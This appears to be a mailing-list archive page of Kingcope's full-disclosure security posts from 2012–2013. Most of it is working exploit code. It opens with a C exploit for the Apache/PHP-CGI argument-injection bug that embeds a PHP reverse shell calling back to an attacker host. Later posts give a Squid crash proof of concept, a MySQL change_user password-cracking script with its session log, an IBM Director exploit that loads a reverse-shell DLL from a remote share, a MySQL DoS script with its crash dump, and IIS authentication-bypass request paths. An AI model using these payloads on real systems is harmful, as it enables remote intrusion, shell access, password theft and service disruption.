Apache PHP Remote Exploit - apache-magika.c
(see attachment) Signed, Kingcope /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of the php5-cgi package. When the php5-cgi package is installed on Debian and Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute the binary because this binary has a security check enabled when installed with Apache http server and this security check is circumvented by the exploit. When accessing the php-cgi binary the security check will block the request and will not execute the binary. In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to no. This makes it possible to execute the binary bypassing the Security check by setting these two php.ini settings. Prior to this code for the Security check getopt is called and it is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch. If both values are set to zero and the request is sent to the server php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary php and therefore we can execute programs on the system. apache-magika.c is an exploit that does exactly the prior described. It does support SSL. /* Affected and tested versions PHP 5.3.10 PHP 5.3.8-1 PHP 5.3.6-13 PHP 5.3.3 PHP 5.2.17 PHP 5.2.11 PHP 5.2.6-3 PHP 5.2.6+lenny16 with Suhosin-Patch Affected versions PHP prior to 5.3.12 PHP prior to 5.4.2 Unaffected versions PHP 4 - getopt parser unexploitable PHP 5.3.12 and up PHP 5.4.2 and up Unaffected versions are patched by CVE-2012-1823. */ /*. /'\rrq rk . // \\ . .x.//fco\\-|- '//cmtco\\zt //6meqrg.\\tq //_\\' EJPGQO apache-magica.c by Kingcope */ #include stdio.h #include stdlib.h #include unistd.h #include getopt.h #include sys/types.h #include stddef.h #include openssl/rand.h #include openssl/ssl.h #include openssl/err.h #include netdb.h #include sys/socket.h #include netinet/in.h typedef struct { int sockfd; SSL *handle; SSL_CTX *ctx; } connection; void usage(char *argv[]) { printf(usage: %s --target target --port port --protocol http|https \ --reverse-ip ip --reverse-port port [--force-interpreter interpreter]\n, argv[0]); exit(1); } char poststr[] = POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F \ %%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64 \ +%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73 \ %%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E \ %%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63 \ %%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62 \ %%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74 \ %%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68 \ %%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F \ %%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63 \ %%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73 \ %%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n \ Host: %s\r\n \ User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 \ (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n \ Content-Type: application/x-www-form-urlencoded\r\n \ Content-Length: %d\r\n \ Connection: close\r\n\r\n%s; char phpstr[] = ?php\n \ set_time_limit(0);\n \ $ip = '%s';\n \ $port = %d;\n \ $chunk_size = 1400;\n \ $write_a = null;\n \ $error_a = null;\n \ $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n \ $daemon = 0;\n \ $debug = 0;\n \ if (function_exists('pcntl_fork')) {\n \ $pid = pcntl_fork(); \n \ if ($pid == -1) {\n \ printit(\ERROR: Can't fork\);\n \ exit(1);\n \ }\n \ if ($pid) {\n \ exit(0);\n \ }\n \ if (posix_setsid() == -1) {\n \ printit(\Error: Can't setsid()\);\n \ exit(1);\n \ }\n \ $daemon = 1;\n \ } else {\n \ printit(\WARNING: Failed to daemonise.\);\n \ }\n \ chdir(\/\);\n \ umask(0);\n \ $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n \ if (!$sock) {\n \ printit(\$errstr ($errno)\);\n \ exit(1);\n \ }\n \ $descriptorspec = array(\n \ 0 = array(\pipe\, \r\),\n \ 1 = array(\pipe\, \w\),\n \ 2 = array(\pipe\, \w\)\n \ );\n \ $process = proc_open($shell, $descriptorspec, $pipes);\n \ if (!is_resource($process)) {\n \ printit(\ERROR: Can't spawn shell\);\n \ exit(1);\n \ }\n \ stream_set_blocking($pipes[0], 0);\n \ stream_set_blocking($pipes[1], 0);\n \ stream_set_blocking($pipes[2], 0);\n \ stream_set_blocking($sock, 0);\n \ while (1) {\n \ if (feof($sock)) {\n \ printit(\ERROR: Shell connection
OpenSSL,OpenSSH ecdsa authentication code inconsistent return values.. no vulnerability?
Hello lists, Attached is the blog post for the mentioned issues that in its shape are not a vulnerability, still interesting to see. http://kingcope.wordpress.com/2013/09/13/opensslopenssh-ecdsa-authentication-code-inconsistent-return-values-no-vulnerability/ Cheers, Kingcope
ProFTPd mod_sftp/mod_sftp_pam invalid pool allocation in kbdint authentication
Hi there! See my blog post about the mentioned vulnerability. http://kingcope.wordpress.com/2013/09/11/proftpd-mod_sftpmod_sftp_pam-invalid-pool-allocation-in-kbdint-authentication/ Cheers, Kingcope
Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption
Hello lists, here you find the analysis of a vulnerability I recently discovered. Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption http://kingcope.wordpress.com/2013/09/02/mikrotik-routeros-5-and-6-sshd-remote-preauth-heap-corruption/ Additionally it includes a way to drop into a development shell for recent Mikrotik RouterOS versions. Cheers : Kingcope
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
hi... I posted the advisory to make administratos aware that it will be still possible to read files with the apache uid even when suEXEC is in place. suEXEC is installed on many hosting providers. I read the cpanel site describing the patches [1], tough standart apache httpd does not have these patches installed. SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive. If a hacker sees an apache installation using suEXEC from an attackers perspective it does not matter where the bug resides, either in Apache or in suEXEC. He just wants to circumvent the suEXEC protection so he can go the way described in the text I posted. This will aid him to escalate privileges further. http://docs.cpanel.net/twiki/bin/vief/EasyApache/Apache/SymlinkPatch#Frequently%20Asked%20Questions
Squid-3.3.5 DoS PoC
#Squid Crash PoC #Copyright (C) Kingcope 2013 #tested against squid-3.3.5 #this seems to be the patch for the vulnerability: #http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch #The squid-cache service will respawn, looks like a kind of assert exception: #2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128 #2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting... #2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries. #2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec). #FATAL: Bungled (null) line 9: snmp_access deny all #Squid Cache (Version 3.2.11): Terminated abnormally. #CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys #Maximum Resident Size: 33312 KB #Page faults with physical i/o: 0 #Memory usage for squid via mallinfo(): #total space in arena:4100 KB #Ordinary blocks: 4046 KB 7 blks #Small blocks: 0 KB 0 blks #Holding blocks: 564 KB 2 blks #Free Small blocks: 0 KB #Free Ordinary blocks: 53 KB #Total in use:4610 KB 112% #Total free:53 KB 1% #2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for i686-pc-linux-gnu... #2013/07/15 20:48:39 kid1| Process ID 2990 use IO::Socket; my $sock = IO::Socket::INET-new(PeerAddr = '192.168.27.146', PeerPort = '3128', Proto= 'tcp'); $a = yc x 2000; print $sock HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n; while($sock) { print; }
Re: Kingcopes AthCon 2012 Slides Notes -- Video online
The video of my talk is online now. Happy watching. https://www.youtube.com/watch?v=fYv5tqv1H3U /Kingcope 2012/5/24 HI-TECH . isowarez.isowarez.isowa...@googlemail.com: Hello lists, you can view my slides notes for my talk entitled Uncovering Zero-Days and advanced fuzzing held at AthCon 2012 at the following places: http://www.isowarez.de/ http://kingcope.wordpress.com/ Cheerio, /Kingcope
New Blog Post: Attacking the Windows 7/8 Address Space Randomization
Hello List, Below is a link to my new Blog Post, http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/ I hope you enjoy it! Kingcope
MySQL Local/Remote FAST Account Password Cracking
FAST Cracking of MySQL account passwords locally or over the network (post-auth) (to the maintainers: you don't need to patch this, looks alot like a minor bug, prolly documented :D) I found a method to crack mysql user passwords locally or over the network pretty efficiently. During Tests it was possible to test 5000 passwords per second over the network. The method is as follows: The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user, this command can be used as the name suggests to change a user during a mysql session. Since mysql is very fast in doing this it is much more powerful to crack passwords rather than reconnecting every time to the mysql server to brute force passwords (what would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command it is a convienent way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server). Below is an example script and an example which uses John the Ripper's capabilities to generate passwords. The passwords pass for the user crackme is cracked in a matter of seconds. (about 10 passwords are tested in 20 seconds) --- cracking script use Net::MySQL; $|=1; my $mysql = Net::MySQL-new( hostname = '192.168.2.3', database = 'test', user = user, password = secret, debug = 0, ); $crackuser = crackme; while(stdin) { chomp; $currentpass = $_; $vv = join \0, $crackuser, \x14. Net::MySQL::Password-scramble( $currentpass, $mysql-{salt}, $mysql-{client_capabilities} ) . \0; if ($mysql-_execute_command(\x11, $vv) ne undef) { print [*] Cracked! -- $currentpass\n; exit; } } --- example session: C:\Users\kingcope\DesktopC:\Users\kingcope\Desktop\john179\run\jo hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH words: 24573 time: 0:00:00:04 w/s: 4916 current: rap words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3 words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429 words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141 words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2 [*] Cracked! -- pass words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs Session aborted Greetings, Kingcope
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday) Copyright (C) 2012 Kingcope IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force to load a dll remotely from a WebDAV share. The following exploit will load the dll from \\isowarez.de\\director\wootwoot.dll the wootwoot.dll is a reverse shell that will send a shell back to the attacker (the code has to be inside the dll initialization routine). The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above. Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880 There was a prior CVE for it, the CVE states the attack can load local files only, using the WebDAV server remote file can be loaded too. To scan for this software you can enter the following (by using pnscan): ./pnscan -wM-POST /CIMListener/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n -r HTTP ipblock 6988 Exploit: ---snip--- use IO::Socket; #1st argument: target host my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0], PeerPort = 6988, Proto= 'tcp'); $payload = qq{?xml version=1.0 encoding=utf-8 ? CIM CIMVERSION=2.0 DTDVERSION=2.0 MESSAGE ID=1007 PROTOCOLVERSION=1.0 SIMPLEEXPREQ EXPMETHODCALL NAME=ExportIndication EXPPARAMVALUE NAME=NewIndication INSTANCE CLASSNAME=CIM_AlertIndication PROPERTY NAME=Description TYPE=string VALUESample CIM_AlertIndication indication/VALUE /PROPERTY PROPERTY NAME=AlertType TYPE=uint16 VALUE1/VALUE /PROPERTY PROPERTY NAME=PerceivedSeverity TYPE=uint16 VALUE3/VALUE /PROPERTY PROPERTY NAME=ProbableCause TYPE=uint16 VALUE2/VALUE /PROPERTY PROPERTY NAME=IndicationTime TYPE=datetime VALUE20010515104354.00:000/VALUE /PROPERTY /INSTANCE /EXPPARAMVALUE /EXPMETHODCALL /SIMPLEEXPREQ /MESSAGE /CIM}; $req = M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1\r\n .Host: $ARGV[0]\r\n .Content-Type: application/xml; charset=utf-8\r\n .Content-Length: . length($payload) .\r\n .Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n .CIMOperation: MethodCall\r\n .CIMExport: MethodRequest\r\n .CIMExportMethod: ExportIndication\r\n\r\n; print $sock $req . $payload; while($sock) { print; } ---snip--- Cheerio, Kingcope
MySQL (Linux) Stack based buffer overrun PoC Zeroday
(see attachment) Cheerio, Kingcope mysql_bufferoverrun.pl Description: Binary data
MySQL (Linux) Heap Based Overrun PoC Zeroday
(see attachment) Cheerio, Kingcope mysql_heapoverrun.pl Description: Binary data
MySQL (Linux) Database Privilege Elevation Zeroday Exploit
(see attachment) Cheerio, Kingcope mysql_privilege_elevation.pl Description: Binary data
MySQL Denial of Service Zeroday PoC
(see attachment) Kingcope 5.5.19-log on SuSE Linux DoS exploit: use Net::MySQL; use Unicode::UTF8 qw[decode_utf8 encode_utf8]; $|=1; my $mysql = Net::MySQL-new( hostname = '192.168.2.3', # Default use UNIX socket database = 'test', user = monty, password = python, debug = 1, ); $mysql-_execute_command(\x12, \x00\x00\x00\x00 foo); exit; for ($k=0;$k5;$k++) { $a .=A$k; } for ($k=0;$k5;$k++) { $a .=/A$k; } # SELECT example $mysql-query(SELECT UpdateXML('a$abccc/bd/d/a', '/a', 'efff/e') AS val1); my $record_set = $mysql-create_record_iterator; while (my $record = $record_set-each) { printf First column: %s Next column: %s\n, $record-[0], $record-[1]; } $mysql-close; Crash Log: started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2 120108 12:55:28 - mysqld got signal 11 ; This could be because you hit a bug. It is also possible that this binary or one of the libraries it was linked against is corrupt, improperly built, or misconfigured. This error can also be caused by malfunctioning hardware. We will try our best to scrape up some info that will hopefully help diagnose the problem, but since we have already crashed, something is definitely wrong and this may fail. key_buffer_size=16777216 read_buffer_size=262144 max_used_connections=1 max_threads=151 thread_count=1 connection_count=1 It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory Hope that's ok; if not, decrease some variables in the equation. Thread pointer: 0x8e6fa48 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong... stack_bottom = 0xa868b35c thread_stack 0x3 /usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63] /usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c] [0xe400] /usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4] /usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac] /usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63] /usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc] /lib/libpthread.so.0(+0x5b05)[0xb771cb05] /lib/libc.so.6(clone+0x5e)[0xb74e7d5e] Trying to get some variables. Some pointers may be invalid and cause the dump to abort. Query ((nil)): is an invalid pointer Connection ID (thread ID): 12 Status: NOT_KILLED The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash. Version: '5.5.19-log' socket: '/var/run/mysql/mysql.sock' port: 3306 Source distribution [New Thread 0xa8f1db70 (LWP 7907)] 120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known 120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xa8f1db70 (LWP 7907)] mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 , pos=value optimized out, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043 1043log_file_name, (llstr(my_b_tell(log), llbuff2), llbuff2)); (gdb) x/10i $eip = 0x81bf54a mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370: mov 0x8(%ecx),%edx 0x81bf54d mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373: mov 0x4(%ecx),%eax 0x81bf550 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376: mov %edx,0x4(%esp) 0x81bf554 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380: mov %eax,(%esp) 0x81bf557 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383: call 0x8541560 llstr 0x81bf55c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388: mov -0x9b0(%ebp),%edx 0x81bf562 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394: lea -0x590(%ebp),%eax 0x81bf568 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400: mov %edi,0x1c(%esp) 0x81bf56c mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404: lea -0x990(%ebp),%edi 0x81bf572 mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410: mov %eax,0x18(%esp) (gdb) i r eax0xa8f1c804 -1460549628 ecx0x0 0 edx0xa8f1c805 -1460549627 ebx0x8e821e0149430752 esp0xa8f1be50 0xa8f1be50 ebp0xa8f1c868 0xa8f1c868 esi0xa8f1c81a -1460549606 edi0xa8f1c804 -1460549628 eip0x81bf54a0x81bf54a mysql_binlog_send(THD*, char*,
MySQL Remote Preauth User Enumeration Zeroday
(see attachment) Cheerio, Kingcope mysql_userenum.pl Description: Binary data
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Correct, I tell that from experience because I've seen many configurations where the least privileged user has file privs enabled. If we leave it that way the attackers will be more happy, it's not decision to patch it or not, just a hint . Regard, Kingcope 2012/12/2 Yves-Alexis Perez cor...@debian.org: On dim., 2012-12-02 at 21:17 +0100, king cope wrote: My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges seperated when with this exploit FILE privileges equate to ALL ADMIN privileges. Maybe because you might not want admins to have read/write access to the filesystem anyway? Regards, -- Yves-Alexis
Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. The posting included some important bugs in the Internet Information Services, one of their flagship products: http://seclists.org/fulldisclosure/2012/Jun/189 The July Security Bulletin doesn't mention any bug. http://technet.microsoft.com/en-us/security/bulletin/ms12-jul I wonder if Microsoft will silently patch the vulnerabilities or just bluntly ignore them. I understand that Microsoft doesn't want to make a big deal about the impact and exposure like in the past, yet I believe that admins should be informed about the threats by their very side. You have to remember that I put much effort into finding these vulnerabilities and you get them for free. With resolving the bugs Microsoft proves that they care about security even if these vulnerabilties where disclosed uncoordinated yet free to patch. /Kingcope
IIS 6.0/7.5 Vulnerabilities [moderate risk] - ISOWAREZ BDAY RELEASE
THIS IS A GENUINE ISOWAREZ RELEASE Title: Microsoft IIS 6.0 with PHP installed Authentication Bypass Affected software: Microsoft IIS 6.0 with PHP installed (tested on Windows Server 2003 SP1 running PHP5) Details: By sending a special request to the IIS 6.0 Service running PHP the attacker can successfully bypass access restrictions. Take for example: 1.) IIS/6.0 has PHP installed 2.) There is a Password Protected directory configured -- An attacker can access PHP files in the password protected directory and execute them without supplying proper credentials. -- Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php IIS/6.0 will gracefully load the PHP file inside the admin directory if the ::$INDEX_ALLOCATION postfix is appended to directory name. This can result in accessing administrative files and under special circumstances execute arbirary code remotely. Title: Microsoft IIS 7.5 Classic ASP Authentication Bypass Affected Software: Microsoft IIS 7.5 with configured Classic ASP and .NET Framework 4.0 installed (.NET Framework 2.0 is unaffected, other .NET frameworks have not been tested) (tested on Windows 7) Details: By appending :$i30:$INDEX_ALLOCATION to the directory serving the classic ASP file access restrictions can be successfully bypassed. Take this Example: 1.) Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files) 2.) There is a password protected directory configured that has administrative asp scripts inside 3.) An attacker requests the directory with :$i30:$INDEX_ALLOCATION appended to the directory name 4.) IIS/7.5 gracefully executes the ASP script without asking for proper credentials Title: Microsoft IIS 7.5 .NET source code disclosure and authentication bypass Affected Software: Microsoft IIS/7.5 with PHP installed in a special configuration (Tested with .NET 2.0 and .NET 4.0) (tested on Windows 7) The special configuration requires the Path Type of PHP to be set to Unspecified in the Handler Mappings of IIS/7.5 Details: The authentication bypass is the same as the previous vulnerabilities: Requesting for example http://victimIIS75/admin:$i30:$INDEX_ALLOCATION/admin.php will run the PHP script without asking for proper credentials. By appending /.php to an ASPX file (or any other file using the .NET framework that is not blocked through the request filtering rules, like misconfigured: .CS,.VB files) IIS/7.5 responds with the full source code of the file and executes it as PHP code. This means that by using an upload feature it might be possible (under special circumstances) to execute arbitrary PHP code. Example: Default.aspx/.php Cheerio and signed, /Kingcope